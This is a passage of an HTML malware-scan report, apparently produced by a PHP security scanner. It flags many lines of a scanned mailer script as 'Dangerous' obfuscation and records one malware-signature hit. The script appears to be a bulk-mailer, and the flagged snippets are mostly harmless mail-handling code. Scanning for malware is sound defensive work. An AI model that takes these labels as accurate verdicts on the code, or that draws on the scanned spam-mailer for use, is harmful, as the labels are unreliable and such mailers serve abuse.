<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4029</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
